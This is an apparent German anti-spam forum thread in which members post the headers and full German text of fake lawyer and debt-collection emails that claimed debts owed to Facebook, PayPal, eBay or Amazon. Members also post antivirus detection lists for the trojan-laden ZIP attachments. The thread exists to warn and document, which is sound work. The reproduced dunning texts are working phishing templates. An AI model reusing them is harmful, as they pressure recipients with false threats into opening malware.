Received: from smtp-out-5.talktalk.net ([62.24.128.249]) by SNT004-MC3F3.hotmail.com with Microsoft SMTPSVC(7.5.7601.22712);
Fri, 26 Sep 2014 xx:xx:xx -0700
Received: from MW-PC ([84.187.114.195])
by c3 with smtp.talktalk.net
ID: [ID filtered]
X-Originating-IP: [84.187.114.195]
X-Spam: 0
X-Authority: v=2.1 cv=Up3tNoAB c=1 sm=1 tr=0 a=Dbm5DgxbT+4qI1iXXlw+sw==:117
a=Dbm5DgxbT+4qI1iXXlw+sw==:17 a=mmOCGfJl6U8A:10 a=jPJDawAOAc8A:10
a=nN7BH9HXAAAA:8 a=GRfH_ceP1a5w0bhbLp8A:9 a=QEXdDO2ut3YA:10
a=umLr9zujJBLdBJyP5hQA:9 a=IKIoO-ieCDEA:10
From: "Rechtsanwalt" <michelle.marks [at] talktalk.net>
To: Vorname/Nachname
Subject: =?utf-8?q?Konto-Lastschrift Nr. 00369551 konnte nicht durchgef=C3=BChrt werden 26.09.2014?=
Date: Fri, 26 Sep 2014 xx:xx:xx GMT
Message-ID: [ID filtered]
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0042_73A60C02.49985EFA"
Return-Path: michelle.marks [at] talktalk.net
X-OriginalArrivalTime: 26 Sep 2014 xx:xx:xx.0016 (UTC) FILETIME=[5B2B7880:01CFD98F]

------=_NextPart_000_0042_73A60C02.49985EFA
Content-Type: text/plain;
charset="utf-8"
Content-Transfer-Encoding: quoted-printable


Sehr geehrter Kunde Vorname/Nachname

Sie haben eine nicht bezahlte Rechnung bei unseren Mandanten Facebook AG. Ihre Bank hat die Kontoabbuchung zurück gebucht. Unsere Forderung ist damit offen und rechtens.

In Vollmacht unseren Mandanten fordern wir Sie auf, die noch offene Forderung unverzüglich zu begleichen. Aufgrund des bestehenden Zahlungsverzug sind Sie gezwungen dabei, die durch unsere Beauftragung entstandenen Kosten von 31,49 Euro zu tragen. Wir erwarten die Zahlung bis spätestens 29.09.2014 auf unser Girokonto. Für Fragen oder Unklarheiten erwarten wir eine Kontaktaufnahme innerhalb des gleichen Zeitraums.

Es erfolgt keine weitere Erinnerung oder Mahnung. Nach Ablauf der festgelegten Frist wird die Akte dem Staatsanwalt und der Schufa übergeben. Die detaillierte Kostenaufstellung, der Sie alle Buchungen entnehmen können, ist beigefügt.

Mit freundlichen Grüßen

Rechtsanwalt Breytenbach Jason

Der Dreck wird laut utrace aus UK verschickt .. Den Anhang lad ich mir besser mal nicht runter ;)

ichliebespam
11.10.2014, 23:57
Return-Path: scottypg [at] blueyonder.co.uk
Received: from know-smtprelay-omc-7.server.virginmedia.net ([80.0.253.71]) by
mx-ha.web.de (mxweb006) with ESMTP (Nemesis) ID: [ID filtered]
<xyx>; Fri, 10 Oct 2014 xx:xx:xx +0200
Received: from SavasYilmaz-PC ([82.82.118.225])
by know-smtprelay-7-imp with bizsmtp
ID: [ID filtered]
X-Originating-IP: [82.82.118.225]
X-Spam: 0
X-Authority: v=2.1 cv=cpwVkjIi c=1 sm=1 tr=0 a=w3GK6a6KnSVhkR5X8Wk8jQ==:117
a=w3GK6a6KnSVhkR5X8Wk8jQ==:17 a=3NElcqgl2aoA:10 a=a5Gf7U6LAAAA:8
a=yaRfqcm6of13_jImlUcA:9 a=QEXdDO2ut3YA:10 a=oQlA28nIh7sA:10
a=QkMCzXBvH_C1tl3zwnwA:9 a=IKIoO-ieCDEA:10 a=Sf_gFPzhefAA:10
From: "Sachbearbeiter" <scottypg [at] blueyonder.co.uk>
To: "xyx" <xyx>
Subject: Rechnung noch offen: Nummer 69976724
Date: Fri, 10 Oct 2014 xx:xx:xx GMT
Message-ID: [ID filtered]
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0048_407DAE3B.37E904B7"
Envelope-To: <xyx>

Sehr geehrte/r xyx,

Ihre Bank hat die Lastschrift storniert. Sie haben eine ungedeckte Forderung bei der Firma Paypal GmbH.

In Vollmacht unseren Mandanten fordern wir Sie auf, die noch offene Gesamtforderung schnellstens zu begleichen. Aufgrund des bestehenden Zahlungsverzug sind Sie verpflichtet außerdem, die durch unsere Inanspruchnahme entstandenen Kosten von 48,59 Euro zu tragen. Wir erwarten die Überweisung inbegriffen der Gebühren bis spätestens 14.10.2014 auf unser Girokonto. Für Fragen oder Reklamationen erwarten wir eine Kontaktaufnahme innerhalb des gleichen Zeitraums.

Es erfolgt keine weitere Erinnerung oder Mahnung. Nach Ablauf der Frist wird die Akte dem Staatsanwalt und der Schufa übergeben. Die detaillierte Kostenaufstellung, der Sie alle Buchungen entnehmen können, ist beigefügt.

Mit freundlichen Grüßen

Sachbearbeiter Schröder Marlon

Anhang : Nicht gedeckten Lastschrift Ihrer Bestellung Paypal vom 08.10.2014.zip - Erkennungsrate: 17/54


AVG Inject2.AZMM
Ad-Aware Trojan.GenericKD.1913007
Avira TR/Crypt.Xpack.99910
BitDefender Trojan.GenericKD.1913007
DrWeb Trojan.Betabot.3
ESET-NOD32 a variant of Win32/Injector.BNIC
Emsisoft Trojan.GenericKD.1913007 (B)
F-Secure Trojan.GenericKD.1913007
GData Trojan.GenericKD.1913007
Ikarus Win32.Outbreak
Kaspersky Trojan.Win32.Yakes.gped
McAfee Artemis!1D08BE88A90E
MicroWorld-eScan Trojan.GenericKD.1913007
Microsoft Trojan:Win32/Matsnu.L
Sophos Mal/Generic-L
TrendMicro TROJ_FORUCON.BMC
TrendMicro-HouseCall TROJ_FORUCON.BMC

Return-Path: webmestre [at] xmust.com
Received: from smtp-sortant2.phpnet.org ([194.110.192.79]) by mx-ha.web.de
(mxweb104) with ESMTP (Nemesis) ID: [ID filtered]
<xyx>; Sat, 11 Oct 2014 xx:xx:xx +0200
Received: from mailfilter2.phpnet.org (mailfilter2.phpnet.org [195.144.11.141])
by smtp-sortant2.phpnet.org (Postfix) with SMTP ID: [ID filtered]
for <xyx>; Sat, 11 Oct 2014 xx:xx:xx +0200 (CEST)
Received: (qmail 3484 invoked by UID: [UID filtered]
Received: from unknown (HELO smtp.phpnet.org) (194.110.192.60)
by mailfilter2.phpnet.org with SMTP; 11 Oct 2014 xx:xx:xx -0000
Received: from host098.olsztyn.so.gov.pl ([213.73.9.98] helo=MAILSERWER)
by smtp.phpnet.org with esmtpsa (TLS1.0:RSA_AES_128_CBC_SHA1:16)
(Exim 4.72)
(envelope-from <webmestre [at] xmust.com>)
ID: [ID filtered]
for poor [at] spamvictim.tld; Sat, 11 Oct 2014 xx:xx:xx +0200
From: "Inkasso" <webmestre [at] xmust.com>
To: "xyx" <xyx>
Subject: Offene Rechnung 22660418
Date: Sat, 11 Oct 2014 xx:xx:xx GMT
Message-ID: [ID filtered]
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0001_4E881CA2.48A93C1A"
ScriptPath: webmestre [at] xmust.com
EximSenderAddress: webmestre [at] xmust.com
Envelope-To: <xyx>

Sehr geehrter Kunde xyx,

Ihre Bank hat die Kontoabbuchung zurück buchen lassen. Sie haben eine nicht gedeckte Forderung bei unseren Mandanten Ebay AG.

Namens unseren Mandanten fordern wir Sie auf, die noch offene Forderung unverzüglich zu bezahlen. Aufgrund des bestehenden Zahlungsverzug sind Sie gezwungen außerdem, die durch unsere Beauftragung entstandenen Gebühren von 55,39 Euro zu tragen. Wir erwarten die Zahlung bis spätestens 15.10.2014 auf unser Konto. Für Fragen oder Reklamationen erwarten wir eine Kontaktaufnahme innerhalb des gleichen Zeitraums.

Es erfolgt keine weitere Mahnung. Nach Ablauf der Frist wird die Akte dem Staatsanwalt und der Schufa übergeben. Die detaillierte Forderungsausstellung, der Sie alle Buchungen entnehmen können, ist beigefügt.

Mit verbindlichen Grüßen

Inkasso Schuster Simon

Anhang : Stornierten Lastschrift Ihrer Bestellung Ebay vom 08.10.2014.zip - Erkennungsrate: 17/54


gleicher Trojaner-Mix wie oben

ichliebespam
12.10.2014, 00:00
Return-Path: sddshcy [at] sina.com
Received: from smtp545-121.mail.sina.com.cn ([202.108.3.164]) by mx-ha.web.de
(mxweb104) with ESMTP (Nemesis) ID: [ID filtered]
<xyx>; Tue, 30 Sep 2014 xx:xx:xx +0200
Received: from unknown( HELO home)([190.235.24.146])
by sina.com with ESMTP
30 Sep 2014 xx:xx:xx +0800 (CST)
X-Sender: sddshcy [at] sina.com
X-Auth-ID: [ID filtered]
X-SMAIL-MID: [ID filtered]
From: "Rechtsanwalt" <sddshcy [at] sina.com>
To: "xyx" <xyx>
Subject: =?utf-8?q?Die automatische Lastschrift konnte nicht durchgef=C3=BChrt werden?=
Date: Tue, 30 Sep 2014 xx:xx:xx GMT
Message-ID: [ID filtered]
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_005C_164C8637.554A8241"
Envelope-To: <xyx>


Sehr geehrte/r xyx,

Sie haben eine nicht gedeckte Forderung bei unseren Mandanten Facebook AG. Das von Ihnen angegebene Bankkonto ist nicht genügend gedeckt um die Lastschrift vorzunehmen.

Namens und in Vollmacht unseren Mandanten fordern wir Sie auf, die noch offene Gesamtforderung schnellstens zu begleichen. Aufgrund des bestehenden Zahlungsverzug sind Sie gezwungen dabei, die durch unsere Beauftragung entstandenen Kosten von 40,33 Euro zu tragen. Wir erwarten die Überweisung bis zum 02.10.2014 auf unser Bankkonto. Für Rückfragen oder Reklamationen erwarten wir eine Kontaktaufnahme innerhalb des selben Zeitraums.

Es erfolgt keine weitere Mahnung. Nach Ablauf der festgelegten Frist wird die Akte dem Gericht und der Schufa übergeben. Die detaillierte Forderungsausstellung, der Sie alle Buchungen entnehmen können, ist beigefügt.

Mit freundlichen Grüßen

Rechtsanwalt von Hutten Philipp

Anhang : Stornierten Buchung Ihrer Bestellung Facebook vom 29.09.2014.zip - Erkennungsrate: 31/54


AVG Generic_s.DXG
Ad-Aware Trojan.GenericKD.1889417
AegisLab AdWare.W32.BrainInst
Agnitum Trojan.Injector!9R6++f4s+f0
Avast Win32:Injector-CBC [Trj]
Avira TR/Crypt.ZPACK.100954
BitDefender Trojan.GenericKD.1889417
Comodo UnclassifiedMalware
Cyren W32/Trojan.DYUB-5816
DrWeb Trojan.Matsnu.65
ESET-NOD32 a variant of Win32/Injector.BMPQ
Emsisoft Trojan.GenericKD.1889417 (B)
F-Secure Trojan.GenericKD.1889417
Fortinet W32/BMPQ!tr
GData Trojan.GenericKD.1889417
Ikarus Trojan-Spy.Zbot
Kaspersky Trojan.Win32.Yakes.gkhq
McAfee RDN/Generic.dx!df3
McAfee-GW-Edition RDN/Generic.dx!df3
MicroWorld-eScan Trojan.GenericKD.1889417
Microsoft Trojan:Win32/Anaki.A
NANO-Antivirus Trojan.Win32.Yakes.dftdqc
Norman Suspicious_Gen4.HBFDZ
Sophos Mal/Wonton-J
Symantec Trojan.Gen
TheHacker Trojan/Injector.bmpq
TrendMicro TROJ_GE.F140FEB7
TrendMicro-HouseCall TROJ_GE.F140FEB7
VBA32 Trojan.Yakes
Zillya Trojan.Yakes.Win32.24347
nProtect Trojan.GenericKD.1889417

Return-Path: chicago208 [at] online.de
Received: from mout.kundenserver.de ([212.227.17.24]) by mx-ha.web.de
(mxweb004) with ESMTPS (Nemesis) ID: [ID filtered]
<xyx>; Sat, 27 Sep 2014 xx:xx:xx +0200
Received: from fabian-PC (a89-182-186-219.net-htp.de [89.182.186.219])
by mrelayeu.kundenserver.de (node=mreue102) with ESMTP (Nemesis)
ID: [ID filtered]
From: "Abrechnung" <chicago208 [at] online.de>
To: "xyx" <xyx>
Subject: Offene Rechnung: xyx Buchung 39017155
Date: Sat, 27 Sep 2014 xx:xx:xx GMT
Message-ID: [ID filtered]
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_002D_1F01A75D.5123F244"
X-Provags-ID: [ID filtered]
XF0ixvYwUoMEKZz8ZkGftf1Qg1FD/UNw+q57eYL75N3bg2pe24
xGLijcnX4jLdcxuWJlAaxvG9F6clTqqY4r/YlQHffV9e+r5SY/
3rT6kOEUM7LTFa9aHTyz1rwYlJCU7MVCfai9oDJsdOKD6qjZEo
xQrw0go1oMobplEw6in1stu2zCAQoBrWDgioECJKo7LkY+PEfT
WCQCQKhu5jLnMiE0t9zFy9bHhY2aEpnrmGaTHFxKaYxv/zMwKN
aRn5a4mTJbpEM+MjBtQ7lacunHjcVbxTj/L3uMmZ1vl8HCaanf
YkoOaJu08uBKcuLsAFgzWWuBD368ggjCVPyhpUUgM
X-UI-Out-Filterresults: notjunk:1;
Envelope-To: <xyx>

Sehr geehrter Kunde xyx,

Sie haben eine nicht beglichene Forderung bei Amazon AG. Das von Ihnen vorliegende Girokonto wurde im Moment der Abbuchung nicht genügend gedeckt um die Lastschrift vorzunehmen.

Namens unseren Mandanten fordern wir Sie auf, die noch offene Gesamtforderung unverzüglich zu bezahlen. Aufgrund des bestehenden Zahlungsverzug sind Sie gezwungen zusätzlich, die durch unsere Tätigkeit entstandenen Kosten von 58,04 Euro zu tragen. Wir erwarten die vollständige Zahlung inklusive der Zusatzgebühren bis zum 29.09.2014 auf unser Girokonto. Für Fragen oder Unklarheiten erwarten wir eine Kontaktaufnahme innerhalb des selben Zeitraums.

Bitte beachten Sie, dass keine weitere Mahnung erfolgt. Nach Ablauf der festgelegten Frist wird die Akte dem Gericht und der Schufa übergeben. Die detaillierte Kostenaufstellung, der Sie alle Buchungen entnehmen können, ist beigefügt.

Mit besten Grüßen

Abrechnung Müller Luis

Anhang: Nicht gedeckten Zahlung Ihrer Bestellung Amazon vom 26.09.2014.zip - Erkennungsrate: 31/54


gleicher Trojaner-Mix wie oben

Rava
13.10.2014, 10:14
Sind diese Email, sie so tun als wären sie von einem RA, und als hätten sie eine rechtliche Grundlage, Geld einzufordern, nicht Grund, es per Anzeige der Staatsanwaltschaft mitzuteilen, das die (auch) versuchen die Spammer zu belangen?

Mittwoch
13.10.2014, 17:10
Sind diese Email, sie so tun als wären sie von einem RA, und als hätten sie eine rechtliche Grundlage, Geld einzufordern, nicht Grund, es per Anzeige der Staatsanwaltschaft mitzuteilen, das die (auch) versuchen die Spammer zu belangen?
Prinzipiell schon, allerdings sind Spammer sehr lichtscheue Gestalten und Staatsanwälte in der Regel nicht bereit, ihre Karriere durch Verfahren zu beeinträchtigen, in denen wegen der Überschreitung mehrerer Landesgrenzen der Ermittlungsaufwand im Vergleich zum potentiellen Schaden in keinem Verhältnis steht. Mal ganz davon abgesehen, dass dafür in aller Regel keine Zeit bleibt.

Die hier infrage kommende Straftat wäre Computermanipulation, und die behandelt das deutsche Strafrecht leider etwas stiefmütterlich.

Schönen Gruß
Mittwoch

cano89
22.10.2014, 10:24
x-store-info:fHNTDlzCF8Nxw6HwcfGQy+S7Ax/lqLSmNphQ3OF+T9E=
Authentication-Results: hotmail.com; spf=pass (sender IP is 66.96.189.6) smtp.mailfrom=SRS0=XknqOx=7N=stlouiscityplace.com=tom [at] eigbox.net; dkim=none header.d=stlouiscityplace.com; x-hmca=none header.id=tom [at] stlouiscityplace.com
X-SID-PRA: tom [at] stlouiscityplace.com
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0wO0Q9MjtHRD0yO1NDTD00
X-Message-Info: 11chDOWqoTnJdcFz6Vgkd3N3eSJkPJ0ORoAvgdqPemVh9GmBDppsHGyde5Xq7+ssLlYpn2Dhsmt2sKiX XMrHWHJJyImH48H2HoVi4PVe4XhJxnKIT4G/f4M86WVm/dmoYkNJKOWaeybcpZb77ljh1xeGFTUeYZTBBMsRqQgcswSvAEA/dxPJptKxGCW14aPSyjrttZq3AMFA1cKFwGibgpimY9zGW44+
Received: from bosmailout06.eigbox.net ([66.96.189.6]) by BAY004-MC4F3.hotmail.com with Microsoft SMTPSVC(7.5.7601.22712);
Tue, 21 Oct 2014 xx:xx:xx -0700
Received: from bosmailscan05.eigbox.net ([10.20.15.5])
by bosmailout06.eigbox.net with esmtp (Exim)
ID: [ID filtered]
for poor [at] spamvictim.tld; Wed, 22 Oct 2014 xx:xx:xx -0400
Received: from [10.115.3.32] (helo=bosimpout12)
by bosmailscan05.eigbox.net with esmtp (Exim)
ID: [ID filtered]
for poor [at] spamvictim.tld; Wed, 22 Oct 2014 xx:xx:xx -0400
Received: from bosauthsmtp10.yourhostingaccount.com ([10.20.18.10])
by bosimpout12 with
ID: [ID filtered]
X-Authority-Analysis: v=2.1 cv=DfGZq5dW c=1 sm=1 tr=0
a=Kpo39fPXdbgqDwiI3/AEUA==:117 a=8zk+uRMxOp2CoAxQDl9GQg==:17 a=pq4jwCggAAAA:8
a=QPcu4mC3AAAA:8 a=0X4_lCE9Q_YA:10 a=st_riBTlsusA:10 a=jPJDawAOAc8A:10
a=2iRzMsXmAAAA:8 a=z64Dz_279wBIsYaf1n4A:9 a=QEXdDO2ut3YA:10
a=jp4DLSUabw0sTuzpeFUA:9 a=IKIoO-ieCDEA:10
Received: from static-090-153-086-076-teleos.ewe-ip-backbone.de ([90.153.86.76]:2153 helo=buero02)
by bosauthsmtp10.eigbox.net with esmtpsa (TLSv1:RC4-MD5:128)
(Exim)
ID: [ID filtered]
for poor [at] spamvictim.tld; Wed, 22 Oct 2014 xx:xx:xx -0400
From: "Inkasso" <tom [at] stlouiscityplace.com>
To: "Mein Vor/Nachname" <poor [at] spamvictim.tld>
Subject: =?utf-8?q?Automatische Lastschrift konnte nicht durchgef=C3=BChrt werden 22.10.2014 Vor/nachname?=
Date: Wed, 22 Oct 2014 xx:xx:xx GMT
Message-ID: [ID filtered]
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_00E1_2E9BDD8D.74CDE881"
X-EN-UserInfo: 41e83bdcbec029b6dd247fce359eedb8:931c98230c6409dcc37fa7e93b490c27
X-EN-AuthUser: tom [at] stlouiscityplace.com
Sender: "Inkasso" <tom [at] stlouiscityplace.com>
X-EN-OrigIP: 90.153.86.76
X-EN-OrigHost: static-090-153-086-076-teleos.ewe-ip-backbone.de
Return-Path: SRS0=XknqOx=7N=stlouiscityplace.com=tom [at] eigbox.net
X-OriginalArrivalTime: 22 Oct 2014 xx:xx:xx.0499 (UTC) FILETIME=[805397B0:01CFEDB1]

------=_NextPart_000_00E1_2E9BDD8D.74CDE881
Content-Type: text/plain;
charset="utf-8"
Content-Transfer-Encoding: quoted-printable


Sehr geehrter Kunde Vor/Nachname

Sie haben eine offene Forderung beim Unternehmen Mail & Media AG Umsatzsteuer ID-Nr.: DE573698954. Das von Ihnen angegebene Bankkonto ist nicht genügend gedeckt um die Kontoabbuchung vorzunehmen.

Namens und in Vollmacht unseren Mandanten fordern wir Sie auf, die offene Forderung schnellstens zu begleichen. Aufgrund des bestehenden Zahlungsverzug sind Sie verpflichtet zusätzlich, die durch unsere Tätigkeit entstandenen Kosten von 45,80 Euro zu tragen. Die vollständige Zahlung erwarten wir bis zum 28.10.2014. Für Rückfragen oder Anregungen erwarten wir eine Kontaktaufnahme innerhalb des selben Zeitraums.

Es erfolgt keine weitere Mahnung. Nach Ablauf der Frist wird die Akte dem Gericht und der Schufa übergeben. Die vollständige Forderungsausstellung, der Sie alle Buchungen entnehmen können, ist beigefügt.

Mit freundlichen Grüßen

Inkasso Köhler Luca

kjz1
23.10.2014, 09:28
Received: from mailout11.t-online.de ([194.25.134.85]) by mx-ha.gmx.net (mxgmx012) with ESMTPS (Nemesis) ID: [ID filtered]
Received: from fwd40.aul.t-online.de (fwd40.aul.t-online.de [172.20.26.139]) by mailout11.t-online.de (Postfix) with SMTP ID: [ID filtered]
Received: from [127.0.0.1] (GcS8SsZArhTllSbt8UeWzwwyGTY2rD7cBAOPmZVWnRxJ1hP5xTxfns3QUqjTwUOZ9u@[174.97.161.166]) by fwd40.t-online.de with (TLSv1:DHE-RSA-AES256-SHA encrypted) esmtp ID: [ID filtered]


Sehr geehrter Kunde,
Ihre fällige Rechnung #50701 finden Sie im Anhang.
Bitte begleichen Sie diese Rechnung bis spätestens 01.01.2015.

Wir danken Ihnen für die Zusammenarbeit und hoffen dass Sie mit unseren Service zufrieden sind.


Hochachtungsvoll

Im Anhang: Informationen_5917.zip

http://virusscan.jotti.org/de/scanresult/f192d157dadaa724a7c273e7883b067ae42767ba/bd88c9f75040ddb7e172cdeeff1133867919e15c

Mittwoch
26.10.2014, 07:45
Ich habe von dieser Stelle drei Beiträge, in denen es "nur" um gefälschte Abmahnungen einer Anwaltskanzlei ging, in ein passendes Thema verschoben.

Eniac
28.10.2014, 08:22
Return-Path: kaf [at] kapurs.net
Received: from kapurs.net ([64.6.229.172]) by mx-ha.gmx.net (mxgmx104) with ESMTPS (Nemesis) ID: [ID filtered]
Received: (qmail 18993 invoked from network); 27 Oct 2014 xx:xx:xx -0400
Received: from fw1.rhode.at (HELO PC-DENISE) (185.45.232.130) by s172.n229.n6.n64.static.myhostcenter.com with (RC4-MD5 encrypted) SMTP; 27 Oct 2014 xx:xx:xx -0400
From: "Inkasso Abteilung" <kaf [at] kapurs.net>
To: "$Vorname $Nachname" <poor [at] spamvictim.tld>
Subject: Automatische Kontoabbuchung konnte nicht durchgeführt werden 27.10.2014 $Vorname $Nachname?=
Date: Mon, 27 Oct 2014 xx:xx:xx GMT
Message-ID: [ID filtered]
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_0063_77DC1413.437939C8"
Envelope-To: <poor [at] spamvictim.tld>


Sehr geehrter Kunde $Vorname $Nachname,

Sie haben eine nicht beglichene Forderung bei unseren Mandanten Amazon GmbH Umsatzsteuer ID-Nr.: DE974643596. Das von Ihnen gespeicherte Girokonto wurde im Moment der Abbuchung nicht genügend gedeckt um die Kontoabbuchung zu realisieren.

Namens unseren Mandanten fordern wir Sie auf, die noch offene Forderung sofort zu begleichen. Aufgrund des bestehenden Zahlungsverzug sind Sie gezwungen außerdem, die durch unsere Tätigkeit entstandenen Gebühren von 24,77 Euro zu tragen. Die Überweisung erwarten wir bis spätestens 01.11.2014. Für Fragen oder Reklamationen erwarten wir eine Kontaktaufnahme innerhalb des selben Zeitraums.

Bitte beachten Sie, dass keine weitere Mahnung erfolgt. Nach Ablauf der festgelegten Frist wird die Angelegenheit dem Staatsanwalt und der Schufa übergeben. Eine vollständige Forderungsausstellung, der Sie alle Einzelpositionen entnehmen können, fügen wir bei.

Mit besten Grüßen

Inkasso Abteilung Amman Mika

Im Anhang eine Datei Rechnung 27.10.2014 - Inkasso Abteilung Amazon GmbH.zip darin eine weitere Datei, die sich jetzt plötzlich auf ebay bezieht: Rechnung nicht gedeckten Buchung Ihrer Bestellung Ebay vom 27.10.2014.zip und die dann endlich den Trojaner Forderung 27.10.2014 - Inkasso Abteilung Ebay GmbH.com enthält. Schon blöd wenn man amazon nicht von ebay unterscheiden kann.


Eniac

madman70
28.10.2014, 20:07
Ganz schön ungeduldig mal wieder - angebliche Rechnung von heute und schon im "Zahlungsverzug" - das nenn ich mal straffe Zahlungsziele:



Sehr geehrter Kunde <immerhin richtiger Name>,

das von Ihnen vorliegende Bankkonto wurde im Moment der Abbuchung nicht genügend gedeckt um die Lastschrift auszuführen. Sie haben eine ungedeckte Rechnung bei unseren Mandanten Ebay AG. Namens unseren Mandanten fordern wir Sie auf, die noch offene Gesamtforderung schnellstens zu bezahlen.

Aufgrund des bestehenden Zahlungsverzug sind Sie gezwungen zuzüglich, die durch unsere Beauftragung entstandenen Kosten von 42,84 Euro zu tragen. Die vollständige Zahlung erwarten wir bis spätestens 03.11.2014. Für Fragen oder Anregungen erwarten wir eine Kontaktaufnahme innerhalb des selben Zeitraums.

Es erfolgt keine weitere Mahnung. Nach Ablauf der festgelegten Frist wird die Akte dem Gericht und der Schufa übergeben. Die detaillierte Kostenaufstellung, der Sie alle Einzelpositionen entnehmen können, ist beigefügt.

Mit verbindlichen Grüßen

Rechnungsstelle Pirkheimer Phil


Hier der Header:


Received: from chicca.cribi.unipd.it ([147.162.170.126]) by mx-ha.web.de
(mxweb104) with ESMTP (Nemesis) ID: [ID filtered]
<xxxxx [at] web.de>; Tue, 28 Oct 2014 xx:xx:xx +0100
Received: by luna.cribi.unipd.it (Postfix, from userID: [ID filtered]
ID: [ID filtered]
X-Spam-Checker-Version: SpamAssassin 3.2.5 (2008-06-10) on luna.cribi.unipd.it
X-Spam-Level:
X-Spam-Status: No, score=-3.9 required=3.0 tests=ALL_TRUSTED,AWL,BAYES_00
autolearn=ham version=3.2.5
Received: from admin-790659070 (dhclient-91-190-28-115.flashcable.ch [91.190.28.115])
by luna.cribi.unipd.it (Postfix) with ESMTPSA ID: [ID filtered]
for <poor [at] spamvictim.tld>; Tue, 28 Oct 2014 xx:xx:xx +0100 (CET)


Drangetackert ein ZIP mit dem üblichen Trojaner, Analyse siehe Virustotal (https://www.virustotal.com/de/file/cd85f0835e78126c1d986a52e30d0da2dce96a8f21c8d0875b4bc58e5f6a6a3d/analysis/1414522769/)...

Helmi98
29.10.2014, 18:28
Seit langer Zeit bekam ich auch mal wieder solche Post:

From Speicherzentrum-Anwalt GmbH Wed Oct 29 xx:xx:xx 2014
X-Apparently-To: xxxxxxx_xxxxxxxxx [at] yahoo.com via 46.228.36.224; Wed, 29 Oct 2014 xx:xx:xx +0000
Return-Path: <support [at] speicheranbieter.de>
Received-SPF: none (domain of speicheranbieter.de does not designate permitted sender hosts)
aG51bmcgMjkuMTAuMjAxNCBLdW5kZTogaGVsbXV0X3NjaHdhcno5OEB5YWhv
by5jb20gU2VociBnZWVocnRlL2VyIEt1bmRlISBsZWlkZXIgYmVmaW5kZXQg
c2ljaCBzZWl0IDE0IFRhZ2VuIGVpbmUgb2ZmZW5lIFJlY2hudW5nIG1pdCBk
ZXIgUmVjaG51bmdzbnVtbWVyOiA3MTQzLTEgaW4gSWhyZW0gQWNjb3VudCBt
aXQgZGVyIEt1bmRlbm51bW1lciA3MTQzLiBFcyBoYW5kZWx0IAEwAQEBAQN0
ZXh0L3BsYWluAwMwAgN0ZXh0L2h0bWwDAzM-
X-YMailISG: 9.YpuZYWLDuw2wEhqDOjDobhfFBPZ36wIaIXKj6l7G4voF91
aw.Z6Oc94tHKz38qrQRZsYk5lKrbaTyioI5ZuNDIM4SK8Enm0F6lhbMJ4Feu
zfd2FFQcU7vqLG13W9EscP4LfcwdzZ_dbVx8JevBsc_kvldRi3jkxsqL4CgT
VLUe5_wu3RZumJtjhwj4iJfdKdHEb8UbzVcL1H_47B6YiJyN4fza6.GbwQ4X
gQr4d4RiL1rnMbPifGzZYFIOXwIyq2SBZhi8ivSFIn25mmbVPHfWKCzdetz5
sMrpRG6kuVr8AS_0SpkiA3pSu4dXrslgqls0iH9RCmC8M.HAP7RVrF7od6_P
cZRbTA7g8DXVwnlMuyLm30jxwlHfUBTuhNE50ONrP7W3XgBitj0vwufHN964
B.LgEgSKxBU7KFp1gli95IuVuMlP7sXdq7eyMn6prbLb_p7jSAHusDOqErSW
KyGLgNgQOK9hayQURBt09OIoIjS2BlkFNzIM_fwmV0tcwrhlYq6pC4XihKfv
e6WLHEgJGdKzhrXsdqXIHaW81We2.gFSVNBIKFYHq3OD1WO_oyAZDS.9ub..
IFJQOQ948B0fBXXdvS6PmWfWurqr5ZIDr4wLfxMXzwv_eDNu8WQlRMKsikdq
BTSJjhQHkJcFbT5zLVtgCssjg4wr6Q.0Yt213OZWzxLcwI4vGWaB4WNecmFE
NvWRnuY11w8DwNJEFvp0Nq0hwhCAA4MaD8N_xfjYcc5vcxUVUz6WCqKHr.mg
xPq6bexlIIVhFK4uT8m3IzlpR2x7d.Z4BrXz4v6Kf5L7EISy9ZTvgIJuMDVW
KM1hDAtOn0qne9xarh6KdMJlKFT2ej0q3q8jra0UVpIwjEKvlAcYlU5oNCt5
V7rBM5Y77sCGgx.mKtwelb9qJuuKnUx51sNhagUTRT8krLyZxh8TBAAuQ3gY
0UDb6LmncfvWGotME8_m4JRMeDNZzOSvzlx5lZJHPJZfsIk8rhVhjoNVvY_N
JKfAN_hTlxoVTsCxS6AspmqS3fVA57v26jljPaLvii.b5ZzWEmS4RjepaIK8
4kQXmtnmDBtcP1nXKZp8CRbmnNdzcfGFIi0pBib6Tgv7r1wHe5KeFYJbC9Km
IAHq9Cie.p4lEUSnXrKpu_ChShKSACxvjUEXsa4cjQfpXkOtX7SaouwssBIQ
5bKQgC1dfvSs0e7EYu.LrgbW6XWRDFHaBjjs1jyXX1Sjn_ka4XkYkrrvhSY5
GY3WBdlknCk0I.jto_lU8s572Hi8VMMqJhaUwG4C_95GUp8KrM5Rr7U8kfx.
nd4zWrGMTnq8Mwi87gaYwjWVwy4E6ln_qq7v_JlOGy9eljTLSlxDz3jOyDJT
6QKhEKu3mwbuvg9rwA--
X-Originating-IP: [194.109.117.105]
Authentication-Results: mta1449.mail.bf1.yahoo.com from=speicheranbieter.de; domainkeys=neutral (no sig); from=speicheranbieter.de; dkim=neutral (no sig)
Received: from 127.0.0.1 (EHLO vps.eeneigen.nl) (194.109.117.105)
by mta1449.mail.bf1.yahoo.com with SMTPS; Wed, 29 Oct 2014 xx:xx:xx +0000
Received: from [109.230.238.187]
by vps.eeneigen.nl with esmtpa (Exim 4.84)
(envelope-from <support [at] speicheranbieter.de>)
ID: [ID filtered]
for poor [at] spamvictim.tld; Wed, 29 Oct 2014 xx:xx:xx +0100
Message-ID: [ID filtered]
Mime-Version: 1.0
From: Speicherzentrum-Anwalt GmbH <support [at] speicheranbieter.de>
To: "11875738;Sehr" <poor [at] spamvictim.tld>
Subject: Mahnung 29.10.2014
Date: Wed, 29 Oct 2014 xx:xx:xx +0100
X-Priority: 2
